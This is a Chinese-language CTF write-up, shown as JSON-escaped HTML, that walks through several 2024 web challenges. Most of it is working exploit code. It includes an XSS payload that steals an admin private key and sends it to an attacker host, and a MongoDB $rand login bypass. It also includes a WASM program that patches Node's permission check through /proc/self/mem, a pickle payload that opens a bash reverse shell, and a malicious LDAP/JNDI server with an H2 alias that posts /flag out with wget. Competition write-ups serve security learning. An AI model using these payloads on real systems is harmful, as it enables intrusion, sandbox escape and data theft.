\u6811\u91cc\u7684\u3002\u5177\u4f53\u6765\u8bf4\u662f\u54ea\u91cc\uff1f\u4e09\u4e2a\u5b57\uff1a\u4e0d\u77e5\u9053\u3002<\/p>\n
<\/p>\n\u56e0\u4e3a\u662f\u771f\u7684\u4e0d\u77e5\u9053\u3002\u6bcf\u6b21\u6e32\u67d3\u751f\u6210\u7684\u5b57\u7b26\u4e32\u662f\u968f\u673a\u7684\uff0c\u6211\u4eec\u53ea\u77e5\u9053 private key \u80af\u5b9a\u5728\u8fd9\u91cc\u5934\uff0c\u4f46\u662f\u65e0\u4ece\u627e\u8d77\u3002\u4e0d\u8fc7\u5176\u5b9e\u4e5f\u597d\u529e\uff0c\u90fd XSS \u80fd\u6267\u884c JS \u4e86\uff0c\u8ba9\u5b83\u76f4\u63a5\u5f00\u641c\u5457\u3002\u7b80\u5355\u5730\u6413\u4e00\u4e2a\u9012\u5f52\u67e5\u627e\u5c5e\u6027\u7684\u3002<\/p>\n
function findVal(object, key, path, depth) {\r\n var value;\r\n Object.keys(object).some(function(k) {\r\n if (k === key) {\r\n console.log(path);\r\n value = object[k];\r\n return true;\r\n }\r\n if (object[k] && typeof object[k] === 'object' && depth > 0) {\r\n value = findVal(object[k], key, path + '.' + k, depth - 1);\r\n return value !== undefined;\r\n }\r\n });\r\n return value;\r\n}\r\nfindVal(document.getElementById(\"root\"), \"privateKey\", '', 10)\r\n\/\/ .__reactContainer$q7dczn7vxl.stateNode.containerInfo.__reactContainer$q7dczn7vxl.stateNode.current.lastEffect.return.memoizedState.memoizedState<\/pre>\n\u641c\u51fa\u6765\u8def\u5f84\u53ef\u80fd\u4e0d\u552f\u4e00\uff0c\u4f46\u6709\u80af\u5b9a\u662f\u6709\u7684\u3002\u7136\u540e\u7528\u7ecf\u5178 img.src \u9001\u5230\u6211\u4eec\u670d\u52a1\u5668\u4e0a\u5373\u53ef\u3002<\/p>\n
\u81f3\u6b64\uff0c\u5df2\u7ecf\u5b8c\u6210\u4e86\u653b\u51fb\u94fe\u7684\u6240\u6709\u6b65\u9aa4\u3002<\/p>\n
V8 \u968f\u673a\u6570\u5411\u524d\u9884\u6d4b\uff0c\u8ba1\u7b97\u5145\u503c\u7801 ==> \u5728 Solidity \u5408\u7ea6\u4e0a slot \u4efb\u610f\u8bfb\u5199 ==> \u4fee\u6539 admin \u7684 Post \u5e76 XSS ==> prvkey \u7b7e\u540d\u5f97\u5230 flag<\/p>\n
import requests, web3, json, binascii\r\nfrom Crypto.Hash import keccak\r\nfrom web3 import Web3\r\nfrom eth_account.messages import encode_defunct\r\n\r\nURL = 'http:\/\/ctf2024-entry.r3kapig.com:32090'\r\n\r\nprvkey = '0x000000000000000000000000000000000000000000000000000000000000000b'\r\n\r\nres = requests.get(URL + '\/api\/backend').json()['data']['blog']\r\naddress = res['address']\r\nabi = res['abi']\r\n\r\nweb3 = Web3(Web3.HTTPProvider(URL + '\/rpc'))\r\naccount = web3.eth.account.from_key(prvkey).address\r\n\r\n# -----------\r\ndef bytes32(i):\r\n return binascii.unhexlify('%064x' % i).hex()\r\ndef keccak256(x):\r\n k = keccak.new(digest_bits=256)\r\n k.update(bytes.fromhex(x))\r\n return k.hexdigest()\r\n\r\nmypos = keccak256(keccak256(bytes32(int(account, 16)) + bytes32(4)))\r\nadmin = '0x04478cD6BD7DE5f721a88d25A2f44edba2627276' # <--- MODIFY TO ADMIN ADDRESS HERE\r\napos = keccak256(keccak256(bytes32(int(admin, 16)) + bytes32(4)))\r\n\r\nprint('from', mypos, '=>', apos)\r\noffset = int(apos, 16) - int(mypos, 16)\r\nif offset < 0:\r\n offset += 2**256\r\nprint('offset', bytes32(offset))\r\nassert(offset % 3 == 0)\r\n# -----------\r\n\r\ncode = 'MWP-nn4lpyib8s418b0t' # <--- MODIFY TO REDEEM CODE HERE\r\nmessage = encode_defunct(text = account + '|' + code)\r\ndata = {'code': code, 'address': account,\r\n 'signature': '0x'+bytes(web3.eth.account.sign_message(message, private_key=prvkey).signature).hex()}\r\nprint(data)\r\nres = requests.post(URL + '\/api\/recharge', json=data)\r\nprint(res.text)\r\n\r\nprint('connected', web3.is_connected())\r\nprint('blockchain', web3.eth.block_number)\r\nprint('my balance', web3.eth.get_balance(account))\r\n\r\nfrom web3.middleware import geth_poa_middleware\r\nweb3.middleware_onion.inject(geth_poa_middleware, layer=0)\r\n\r\ncontract = web3.eth.contract(address=address, abi=abi)\r\nprint('username_count', contract.functions.getUserNameCount().call())\r\n\r\ndef call(total_fee, func):\r\n transaction = {\r\n 'from': account,\r\n 'value': total_fee,\r\n 'gas': 3000000, # adjust the gas limit as needed\r\n 'gasPrice': web3.to_wei('5', 'gwei'), # adjust the gas price as needed\r\n 'nonce': web3.eth.get_transaction_count(account)\r\n }\r\n\r\n txn = func.build_transaction(transaction)\r\n signed = web3.eth.account.sign_transaction(txn, prvkey)\r\n txn_hash = web3.eth.send_raw_transaction(signed.rawTransaction)\r\n\r\n print(txn_hash.hex())\r\n\r\n web3.eth.wait_for_transaction_receipt(txn_hash.hex())\r\n print(web3.eth.get_transaction_receipt(txn_hash.hex()))\r\n\r\nusername = 'hello10'\r\nfee_per_byte = 5 * 10**12 # 5 szabo in wei\r\ntotal_fee = fee_per_byte * len(username)\r\nprint('registering')\r\ncall(total_fee, contract.functions.register(username=username))\r\n\r\nprint('username_count', contract.functions.getUserNameCount().call())\r\n\r\nprint('undo') # 1 finney\r\ncall(10 ** 15, contract.functions.undo())\r\n\r\n#print('read', web3.eth.get_storage_at(address, keccak256(apos)))\r\nprint('article', contract.functions.read(user=admin, id=0).call())\r\n\r\ntitle = 'mytitle'\r\ncontent = '''<img src=x onerror=\"var f=(o,t,d)=>{var v;Object.keys(o).some(function(k){if(k===t){v=o[k];return true;}if(o[k]&&typeof o[k]==='object'&&d>0){v=f(o[k],t,d-1);return v!==undefined;}});return v;};this.src='http:\/\/IP:POST\/?'+f(document.getElementById('root'),'privateKey',10);\" \/>'''\r\nfee_per_byte = 50 * 10**12\r\ntotal_fee = fee_per_byte * len(title + content)\r\nprint('editing')\r\ncall(total_fee, contract.functions.edit(id=offset\/\/3, title=title, content=content))\r\n\r\nprint('article', contract.functions.read(user=admin, id=0).call())\r\n\r\nres = requests.post(URL + '\/api\/bot')\r\nprint(res.text)\r\n\r\napv = input('the admin private key: ').strip()\r\nmessage = encode_defunct(text = admin.lower() + ': vivo flag')\r\ndata = {'message': message.body.decode(),\r\n 'signature': '0x'+bytes(web3.eth.account.sign_message(message, private_key=apv).signature).hex()}\r\nprint(data)\r\nres = requests.post(URL + '\/api\/flag', json=data)\r\nprint(res.text)<\/pre>\n<\/a>\u00a0<\/p>\n
- \n
- web >> JustMongo
\n<\/strong><\/span><\/li>\n<\/ul>\n\u521a\u5f00\u59cb\u88ab\u9a97\u60e8\u4e86\uff0c\u8fd8\u4ee5\u4e3a\u8981\u9003\u9038 mongodb \u90a3\u4e2a mozjs\uff0c\u7ffb\u534a\u5929\u6e90\u4ee3\u7801\u65e0\u679c\u3002\u770b\u4e86 hint \u624d\u77e5\u9053\uff0c\u634f\u9ebb\u9ebb\u7684\uff0c\u539f\u6765\u53ef\u4ee5\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u3002<\/p>\n
\u4e0b\u4e86\u4e2a index.mjs \u770b\u770b\uff0c\u8fd9\u91cc query \u76f4\u63a5\u5e26\u8fdb db.findOne() \u80af\u5b9a\u662f\u6709\u95ee\u9898\u7684\u3002\u518d\u770b\u770b\uff0c\u5bc6\u7801\u5b58\u7684\u662f bcrypt \u52a0\u5bc6\u540e\u7684\uff0c\u4e5f\u5c31\u662f\u8bf4\u5373\u4f7f\u80fd\u628a\u5bc6\u7801\u6ce8\u51fa\u6765\u4e5f\u6ca1\u7528\uff0c\u5e94\u5f53\u8003\u8651\u767b\u5f55\u76f8\u5173\u903b\u8f91\u7684\u7ed5\u8fc7\u3002<\/p>\n
<\/p>\n\u521a\u5f00\u59cb\u672c\u6765\u60f3\u8ba9\u5b83\u76f4\u63a5\u8fd4\u56de\u4e2a\u56fa\u5b9a\u7684 username \u8ddf password\uff0c\u4f46\u662f MongoDB \u597d\u50cf\u4e0d\u652f\u6301\u8fd9\u79cd\u3002\u518d\u4e00\u770b\uff0c\u8fd9\u548b\u56de\u4e8b\uff0c\u5148 verifyUser() \u8dd1\u4e86\u4e00\u904d\uff0c\u540e\u9762\u83b7\u53d6 permium \u53c8 find() \u4e86\u4e00\u904d\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u53ef\u4ee5\u5229\u7528\u8fd9\u4e24\u6b21 find() \u4e4b\u95f4\u7684\u5dee\u5f02\uff0c\u5bc6\u7801\u7528\u6211\u4eec\u7684\u68c0\u9a8c\u901a\u8fc7\uff0c\u7136\u540e premium \u7528 admin \u7684\u3002\u7b54\u6848\u5df2\u7ecf\u547c\u4e4b\u6b32\u51fa\u4e86\uff0c$rand{} \u4e00\u4e0b\u5c31\u5b8c\u4e8b\u4e86\u30021\/2 \u7684\u6982\u7387\u8fd4\u56de\u6211\u4eec\u7684 test \u7528\u6237\uff0c\u7528\u4e8e\u901a\u8fc7\u5bc6\u7801\u68c0\u9a8c\uff0c1\/2 \u7684\u6982\u7387\u8fd4\u56de admin\uff0c\u83b7\u53d6 premium\u3002<\/p>\n
{\"$expr\": {\"$eq\": [\"$username\", {\"$cond\": [{\"$gt\": [{\"$rand\": {}}, 0.4]}, \"admin\", \"test\"]}]}, \"password\": \"12345678\"}<\/pre>\n\u5dee\u4e0d\u591a\u5e73\u5747 5s \u5185\uff0c\u80fd\u7206\u51fa\u6765\u3002\u7136\u540e\u770b\u770b\u771f\u6b63\u9700\u8981\u7ed5\u8fc7\u7684 sandbox \u957f\u5565\u6837\u3002<\/p>\n
<\/p>\n<\/p>\n\u770b\u4e86\u8001\u534a\u5929\uff0c\u5176\u4ed6\u90fd\u4e0d\u662f\u5173\u952e\u70b9\uff0c\u7b80\u5355\u6765\u8bf4\uff0c\u5c31\u662f\u8981\u7ed5\u8fc7
--experimental-permission<\/code>\u3002<\/p>\n\u6839\u636e\u5f80\u5e74\u7684 CVE\uff0c\u901a\u8fc7 require\uff0cInspector\/Worker \u7b49\u7ed5\u8fc7\uff0c\u5e94\u5f53\u53ef\u4ee5\u60f3\u5230\u8fd9\u91cc\u53ef\u80fd\u8fd8\u5b58\u5728\u67d0\u4e9b\u4e0d\u9075\u5b88\u8fd9\u73a9\u610f\u9650\u5236\u7684\u4e1c\u897f\u3002\u7136\u540e\u5c31\u5728 PR \u7684\u7b2c\u4e8c\u9875\uff08\u4e00\u5468\u524d\u53d1\u5e03\uff09\u7ffb\u5230\u4e86\u5173\u4e8e “prevent WASI exec” \u7684\u63cf\u8ff0\u3002<\/p>\n
https:\/\/github.com\/nodejs\/node\/commit\/3ab0499d434078676261512a67897f4c2f433e43<\/a><\/p>\n
\u8fc7\u4e00\u773c\u5c31\u660e\u767d\u4e86\uff0c\u4e5f\u5c31\u662f\u8bf4 WASM \u8fd9\u73a9\u610f\u53ef\u4ee5\u7ed5\u8fc7\u6c99\u7bb1\u7684\u9650\u5236\uff0c\u4efb\u610f\u8bfb\u5199\u6587\u4ef6\u3002\u9898\u76ee\u73af\u5883\u91c7\u7528 node 20.14.0\uff0c\u867d\u7136\u5f88\u65b0\uff0c\u4f46\u8fd9\u4e2a issue \u66f4\u65b0\uff0c\u6240\u4ee5\u53ef\u4ee5\u5229\u7528\u3002<\/p>\n
\u5199\u8fd9\u73a9\u610f\u7684 wasm \u5b9e\u5728\u662f\u5934\u75bc\uff0c\u6587\u6863\u91cc\u4e5f\u4e0d\u8bf4\u6e05\u695a\uff0c\u8fd8\u5f97\u81ea\u5df1\u7ffb\u3002Node.JS \u91cc\u53ea\u63d0\u4f9b\u4e86 wasi_snapshot_preview1 \u7cfb\u5217\u7684\u6807\u51c6\u63a5\u53e3\u53ef\u4f9b\u8c03\u7528\uff0c\u5305\u62ec path_open\u3001fd_write\u3001fd_seek \u7b49\uff0c\u5565\u90fd\u5f97\u81ea\u5df1\u5b9e\u73b0\u3002<\/p>\n
https:\/\/nodejs.org\/api\/wasi.html<\/a><\/p>\n
https:\/\/fossies.org\/linux\/wasm3\/source\/extra\/wasi_core.h<\/a><\/p>\n
\u4e4b\u524d\u7684\u60f3\u6cd5\u662f\u5148\u5217\u76ee\u5f55\u770b\u770b\u6709\u4ec0\u4e48\u6548\u679c\uff0c\u867d\u7136\u8bfb\u5230 \/readflag \u7684\u65f6\u5019\u5df2\u7ecf\u6709\u70b9\u53d1\u614c\u4e86\uff0c\u4f46\u8fd8\u662f\u5199 wasm \u5199\u4e86\u4e00\u6bb5\u65f6\u95f4\uff0c\u5305\u62ec\u7531\u4e8e wasm \u4e2d\u6ca1\u6709\u56de\u663e\uff0c\u5176\u8f93\u51fa\u600e\u4e48\u8ddf Node.JS \u4ea4\u4e92\uff0c\u7b49\u7b49\u3002\u7136\u540e\u53d1\u73b0\u786e\u5b9e\u662f\u8981 RCE\uff0c\u8fd9\u4e0b\u96be\u53d7\u4e86\u3002<\/p>\n
\u4e0d\u8fc7\u597d\u5728\u53ef\u4ee5\u8bfb\u5199 \/proc\/self\/mem\uff0c\u7406\u8bba\u4e0a\u53ef\u4ee5\u91c7\u7528 pwn \u7684\u90a3\u79cd\u65b9\u5f0f\u52ab\u6301\u63a7\u5236\u6d41\uff0c\u8fd9\u91cc\u4f7f\u7528\u4e86\u4e00\u79cd\u6bd4\u8f83\u7b80\u5355\u7684\u5b9e\u73b0\uff0c\u5c31\u662f\u628a experimental-permissions \u5e26\u6765\u7684\u5f71\u54cd\u7ed9 patch \u6389\u3002<\/p>\n
<\/p>\n\u5728 native \u4ee3\u7801\u91cc\uff0c\u6700\u7ec8\u8c03\u7528\u7684\u90fd\u662f\u8fd9\u4e2a\u5b8f\uff0c\u6700\u540e\u8fdb\u5230 is_scope_granted()<\/p>\n
<\/p>\n\u597d\u5728 node \u6ca1\u6709 PIE\uff0c\u800c\u4e14\u9898\u76ee\u73af\u5883\u4e2d\u7684\u7248\u672c\u53ef\u4ee5\u4e0b\u4e0b\u6765\uff0c\u6240\u4ee5\u8fd9\u91cc\u7684 offset \u90fd\u662f\u56fa\u5b9a\u7684\u3002<\/p>\n
<\/p>\n\u8fd9\u51fd\u6570\u91cc\u8fb9\u968f\u4fbf\u6311 6 \u4e2a\u5b57\u8282\uff0c\u5199\u6210
0xB8, 0x01, 0x00, 0x00, 0x00, 0xC3<\/code> \u4e5f\u5c31\u662fmov eax, 1 ; retn<\/code> \u5373\u53ef\u3002
\n\u7528 wasm \u5b9e\u73b0\uff0c\u4e5f\u5c31\u662f\uff1a<\/p>\n\/\/ docker run --rm -v $(pwd):\/src -u $(id -u):$(id -g) emscripten\/emsdk emcc file_patch.c -o file_patch.wasm -s WASM=1 -s STANDALONE_WASM\r\n\r\n#include <wasi\/api.h>\r\n\r\n#define BUF_SIZE 1024\r\n\r\nunsigned long strlen(const char* str) {\r\n const char* p = str;\r\n unsigned long len = 0;\r\n while (*(p++)) len++;\r\n return len;\r\n}\r\n\r\n\/\/ Declare the external function\r\nextern void custom_write(int c) __attribute__((import_module(\"env\"), import_name(\"custom_write\")));\r\n\r\nvoid my_write(const char *entry, int length) {\r\n while (length--) custom_write(*(entry++)); \/\/ Call the custom Node.js function\r\n custom_write('\\n'); \/\/ Print newline\r\n}\r\n\r\nvoid handle_error(__wasi_errno_t err) {\r\n if (err != __WASI_ERRNO_SUCCESS) {\r\n my_write(\"err:\", 4); custom_write(err);\r\n __wasi_proc_exit(err);\r\n }\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n const char* wpath = \"\/proc\/self\/mem\";\r\n\r\n __wasi_errno_t status;\r\n __wasi_fd_t wfd;\r\n status = __wasi_path_open(3, 0, wpath, strlen(wpath),\r\n 0, __WASI_RIGHTS_FD_WRITE | __WASI_RIGHTS_FD_READ | __WASI_RIGHTS_FD_SEEK, 0, 0, &wfd);\r\n handle_error(status);\r\n\r\n __wasi_filesize_t noff;\r\n status = __wasi_fd_seek(wfd, 0x00e0ed57, __WASI_WHENCE_SET, &noff);\r\n handle_error(status);\r\n\r\n unsigned char filebuf[1024] = { 0xB8, 0x01, 0x00, 0x00, 0x00, 0xC3 };\r\n __wasi_ciovec_t iov = {\r\n .buf = filebuf,\r\n .buf_len = 6\r\n };\r\n size_t nread;\r\n status = __wasi_fd_write(wfd, &iov, 1, &nread);\r\n handle_error(status);\r\n\r\n __wasi_fd_close(wfd);\r\n\r\n my_write(\"suc\", 3);\r\n\r\n return 0;\r\n}<\/pre>\n\u5199\u5b8c\u4e4b\u540e Node.JS \u5c31\u8ddf\u6ca1\u6709\u9650\u5236\u4e00\u6837\u4e86\uff0c\u76f4\u63a5 execSync() \u8bfb flag \u5373\u53ef\u3002<\/p>\n
import { WASI } from 'node:wasi';\r\nimport { execSync } from 'node:child_process';\r\n\r\nexport async function main() {\r\n\r\nconst wasi = new WASI({\r\n version: 'preview1',\r\n args: ['mywasm', '\/', '\/proc\/self\/maps'],\r\n env: {},\r\n preopens: {\r\n '\/': '\/',\r\n },\r\n});\r\n\r\nlet s = '';\r\nfunction customWrite(c) {\r\n if (c > 128) s += c.toString(16);\r\n else s += String.fromCharCode(c)\r\n}\r\n\r\nawait (async () => {\r\n const wasm = await WebAssembly.compile(\r\n Buffer.from(\"[HEX]\", \"hex\"),\r\n );\r\n const instance = await WebAssembly.instantiate(wasm, {\r\n ...wasi.getImportObject(),\r\n env: {\r\n custom_write: customWrite,\r\n },\r\n });\r\n\r\n wasi.start(instance);\r\n})();\r\n\r\n\/\/return s;\r\nreturn execSync('\/readflag').toString();<\/pre>\n<\/p>\n
import requests\r\n\r\nURL = 'http:\/\/ctf2024-entry.r3kapig.com:32482'\r\n\r\ndata = {'username': 'test', 'password': '12345678'}\r\nres = requests.post(URL + '\/api\/register', json=data)\r\nprint(res.text)\r\n\r\nwhile True:\r\n data = {\"$expr\": {\"$eq\": [\"$username\", {\"$cond\": [{\"$gt\": [{\"$rand\": {}}, 0.4]}, \"admin\", \"test\"]}]}, \"password\": \"12345678\"}\r\n res = requests.post(URL + '\/api\/login', json=data)\r\n print(res.text)\r\n\r\n if res.status_code == 200:\r\n token = res.json()['token']\r\n res = requests.get(URL + '\/api\/session', params={'token': token})\r\n print(res.text)\r\n if res.json()['plan'] == 'premium':\r\n break\r\n\r\nwith open('file_patch.wasm', 'rb') as f:\r\n HEX = f.read().hex()\r\n\r\nmjs = '''\r\n \/\/ <--- above MJS code\r\n'''.replace('[HEX]', HEX)\r\n\r\ndata = {'code': mjs, 'token': token}\r\nres = requests.post(URL + '\/api\/run', json=data)\r\nprint(res.json())<\/pre>\n\u540e\u6ce8\uff1a\u6700\u540e\u63d0\u793a websocket \u4e86\u8fd8\u662f\u6ca1\u60f3\u5230\uff0c\u5411 parnet \u53d1 SIGUSR1 \u53ef\u4ee5\u76f4\u63a5\u6253\u5f00 inspector\uff0cdebug \u7236\u8fdb\u7a0b\uff0c\u5c31\u4e0e\u6c99\u7bb1\u5b8c\u5168\u65e0\u5173\u4e86\u3002<\/p>\n
<\/a>\u00a0<\/p>\n
- \n
- web >> NinjaClub<\/strong><\/span><\/li>\n<\/ul>\n
\u534a\u5c0f\u65f6\u89e3\u51b3\u3002Jinja2 \u7684 SandboxEnvironment \u57fa\u672c\u4e0a\u6ca1\u6cd5\u9003\u9038\uff0c\u628a\u4e0b\u5212\u7ebf\uff0c\u5185\u7f6e\u7c7b\u578b\u68c0\u6d4b\u4e86\u4e2a\u904d\u3002\u90a3\u4e48\u95ee\u9898\u5c31\u5728\u4e8e\u4f20\u8fdb\u53bb\u7684\u53c2\u6570\uff0cpydantic \u6e90\u4ee3\u7801\u987a\u7740\u5f80\u91cc\u8fb9\u7ffb\u4e00\u7ffb\uff0c\u9a6c\u4e0a\u5c31\u80fd\u53d1\u73b0\uff1a<\/p>\n
<\/p>\n\u8fd9\u4e2a allow_pickle \u53c2\u6570\u53ef\u7591\u5f97\u4e0d\u80fd\u518d\u53ef\u7591\u4e86\u597d\u5427\u3002\u7ee7\u7eed\u8ddf\u8fdb\uff0c\u76f4\u63a5 pickle.load() \u4e86\u5c31\uff0ccontent_type \u4e5f\u662f\u53ef\u63a7\u7684\u3002<\/p>\n
<\/p>\nPoC \u6ca1\u4ec0\u4e48\u597d\u8bf4\uff0c\u4e00\u6b65\u5230\u4f4d\u3002<\/p>\n
{{user.parse_raw('c__builtin__\\neval\\np0\\n(V__import__(\"os\").system(\"\/bin\/bash -c \\'bash -i >& \/dev\/tcp\/IP\/PORT 0>&1\\'\")\\np1\\ntp2\\nRp3\\n.',content_type='pickle',allow_pickle=True)}}<\/code><\/p>\n<\/p>\n
\n<\/a>\u00a02024\u5e745\u6708\u00a0 \u4eac\u9e92CTF
\n<\/strong><\/span><\/p>\n- \n
- \n
web >> ezldap
\n<\/strong><\/span><\/p>\n<\/li>\n<\/ul>\n\u9996\u5148 actuator \u6cc4\u9732\uff0c\u5728 \/actuator\/mappings \u53ef\u4ee5\u770b\u5230\u9690\u85cf\u8def\u7531 \/source_tr15d0\uff0c\u4e3a\u4f7f\u7528 ldap:\/\/ \u8fde\u63a5\u7684 \/lookup \u8def\u7531\u6e90\u4ee3\u7801\u3002\u67e5\u770b env \u53d1\u73b0
com.sun.jndi.ldap.object.trustSerialData=false<\/code>\uff0c\u6ca1\u6709\u529e\u6cd5\u8d70\u53cd\u5e8f\u5217\u5316\uff0c\u800c\u4e14 heapdump \u53ef\u4ee5\u641c\u5230 jdk 17 \u4ee5\u53ca springboot 2.7.18 \u90fd\u975e\u5e38\u7684\u65b0\u3002<\/p>\nhttps:\/\/tttang.com\/archive\/1405\/#toc_tomcat-jdbc<\/a><\/p>\n
\u6709 tomcat-jdbc \u4f9d\u8d56\uff0cRMI \u6309\u7167\u4e0a\u9762\u7684 PoC \u6253\u5c31\u5b8c\u4e8b\u4e86\uff0cldap \u7684\u8bdd\uff0c\u6839\u636e\u8c03\u7528\u94fe\u53ef\u4ee5\u770b\u5230 lookup() \u6700\u7ec8\u4e5f\u662f getObjectInstance()\uff0c\u7ee7\u7eed\u8ddf\u8fdb decodeObject() \u770b\u770b\u600e\u4e48\u5904\u7406 ReferenceRef\u3002<\/p>\n
<\/p>\n\u7ee7\u7eed\u8ddf\u8fdb decodeReference()\u3002<\/p>\n
<\/p>\n\u8fd9\u91cc\u53ef\u4ee5\u770b\u89c1 className \u8ddf factory \u90fd\u53ef\u63a7\u4e86\uff0c\u6ce8\u610f\u8fd9\u4e2a RefAddr\uff0c\u7ee7\u7eed\u5f80\u4e0b\u627e\u3002<\/p>\n
<\/p>\n\u6700\u540e\u4e5f\u5c31\u662f\u5f53\u505a StringRefAddr \u53c2\u6570\u52a0\u8fdb\u53bb\u4e86\uff0c\u81f3\u6b64\u8ddf RMI \u8c03\u7528\u94fe\u5b8c\u5168\u4e00\u81f4\uff0c\u6309\u7167\u5b83\u7684\u683c\u5f0f\u8d77\u4e00\u4e2a ldap \u5373\u53ef\u3002<\/p>\n
<\/p>\n\u8fd9\u91cc\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0cCREATE TRIGGER \u597d\u50cf\u56e0\u4e3a\u7248\u672c\u7684\u539f\u56e0\u6253\u4e0d\u901a\uff0c\u6362\u6210 RUNSCRIPT FROM \u7ee7\u7eed\u6253\u3002\u8fdc\u7a0b\u73af\u5883\u662f Alpine\uff0c\u6ca1\u6709 bash\uff0c\u7528
wget --post-file \/flag<\/code> \u5e26\u51fa\u6570\u636e\u3002<\/p>\nCREATE ALIAS EXECz AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"\";}';\r\nCALL EXECz ('wget --post-file \/flag http:\/\/IP:PORT\/')<\/pre>\n<\/p>\n
package com.example.demo;\r\nimport com.unboundid.ldap.listener.InMemoryDirectoryServer;\r\nimport com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;\r\nimport com.unboundid.ldap.listener.InMemoryListenerConfig;\r\nimport com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;\r\nimport com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;\r\nimport com.unboundid.ldap.sdk.Entry;\r\nimport com.unboundid.ldap.sdk.LDAPException;\r\nimport com.unboundid.ldap.sdk.LDAPResult;\r\nimport com.unboundid.ldap.sdk.ResultCode;\r\nimport com.unboundid.util.Base64;\r\n\r\nimport javax.net.ServerSocketFactory;\r\nimport javax.net.SocketFactory;\r\nimport javax.net.ssl.SSLSocketFactory;\r\nimport java.net.InetAddress;\r\nimport java.net.MalformedURLException;\r\nimport java.text.ParseException;\r\n\r\n\r\npublic class ldap_server {\r\n\r\n private static final String LDAP_BASE = \"dc=example,dc=com\";\r\n public static void main (String[] args) {\r\n int port = 1389;\r\n try {\r\n InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);\r\n config.setListenerConfigs(new InMemoryListenerConfig(\r\n \"listen\",\r\n InetAddress.getByName(\"0.0.0.0\"),\r\n port,\r\n ServerSocketFactory.getDefault(),\r\n SocketFactory.getDefault(),\r\n (SSLSocketFactory) SSLSocketFactory.getDefault()));\r\n\r\n config.addInMemoryOperationInterceptor(new OperationInterceptor());\r\n InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);\r\n System.out.println(\"Listening on 0.0.0.0:\" + port);\r\n ds.startListening();\r\n\r\n }\r\n catch ( Exception e ) {\r\n e.printStackTrace();\r\n }\r\n }\r\n\r\n private static class OperationInterceptor extends InMemoryOperationInterceptor {\r\n public OperationInterceptor () {\r\n }\r\n\r\n @Override\r\n public void processSearchResult ( InMemoryInterceptedSearchResult result ) {\r\n String base = result.getRequest().getBaseDN();\r\n Entry e = new Entry(base);\r\n try {\r\n sendResult(result, base, e);\r\n }\r\n catch ( Exception e1 ) {\r\n e1.printStackTrace();\r\n }\r\n\r\n }\r\n protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException {\r\n e.addAttribute(\"objectClass\", \"javaNamingReference\"); \/\/$NON-NLS-1$\r\n e.addAttribute(\"javaClassName\", \"javax.sql.DataSource\");\r\n e.addAttribute(\"javaFactory\", \"org.apache.tomcat.jdbc.pool.DataSourceFactory\");\r\n String JDBC_URL = \"jdbc:h2:mem:memdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http:\/\/REMOTE_IP\/h2.sql'\";\r\n e.addAttribute(\"javaReferenceAddress\", \"#0#driverClassName#org.h2.Driver\");\r\n e.addAttribute(\"javaReferenceAddress\", \"#1#url#\"+JDBC_URL);\r\n e.addAttribute(\"javaReferenceAddress\", \"#2#username#sa\");\r\n \/\/e.addAttribute(\"javaReferenceAddress\", \"#3#password#\");\r\n e.addAttribute(\"javaReferenceAddress\", \"#3#initialSize#1\");\r\n e.addAttribute(\"javaReferenceAddress\", \"#4#init#true\");\r\n result.sendSearchEntry(e);\r\n result.setResult(new LDAPResult(0, ResultCode.SUCCESS));\r\n }\r\n }\r\n}\r\n<\/pre>\n<\/p>\n
\n<\/a>\u00a02024\u5e744\u6708\u00a0 D^3CTF
\n<\/strong><\/span><\/p>\n- \n
- \n
web >> d3pythonhttp<\/strong><\/span><\/p>\n<\/li>\n<\/ul>\n
\u524d\u9762 Flask\uff0c\u540e\u9762 web.py\uff0c\u660e\u663e\u662f\u5229\u7528\u89e3\u6790\u5dee\u5f02\u3002<\/p>\n
<\/p>\n<\/p>\nFlask \u8fd9\u91cc\u662f lower()\uff0c\u5e95\u4e0b\u7684 web.py \u76f4\u63a5\u5224\u65ad\uff0c\u6240\u4ee5\u53d6 “Chunked” \u53ef\u4ee5\u4f7f\u524d\u9762\u6b63\u5e38\u89e3\u6790\u800c\u540e\u9762\u4fdd\u7559\u3002<\/p>\n
Fuzz \u4e00\u4e0b\uff0c\u53d1\u73b0 Flask \u5bf9 Content-Length \u4e0d\u654f\u611f\uff0cwsgi \u89e3\u5b8c chunk \u540e web.py \u521a\u597d\u6839\u636e CL \u622a\u65ad\uff0c\u53ef\u4ee5\u628a\u540e\u9762\u7684 Backdoor… \u5b57\u7b26\u4e32\u5220\u53bb\uff0c\u4fdd\u7559\u524d\u8fb9\u5b8c\u6574\u7684 base64 payload\u3002<\/p>\n
\u5bf9\u4e8e jwt \u7684\u90e8\u5206\uff0ckid \u53ef\u4ee5\u76ee\u5f55\u7a7f\u8d8a\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6\uff0c\u968f\u4fbf\u9009\u4e00\u4e2a\u5f53 key \u5c31\u53ef\u4ee5\u3002\u4e0b\u56fe\u4e2d\u8fd9\u4e2a\u6587\u4ef6\u8bfb\u51fa\u6765\u662f “Linux”\u3002<\/p>\n
<\/p>\n\u6700\u540e\u76f4\u63a5 pickle R(CE) \u5373\u53ef\uff0c\u7531\u4e8e\u4e0d\u51fa\u7f51\uff0c\u76f4\u63a5 exec \u66ff\u6362 index.GET \u9ed8\u8ba4\u8def\u7531\u56de\u663e\u3002<\/p>\n
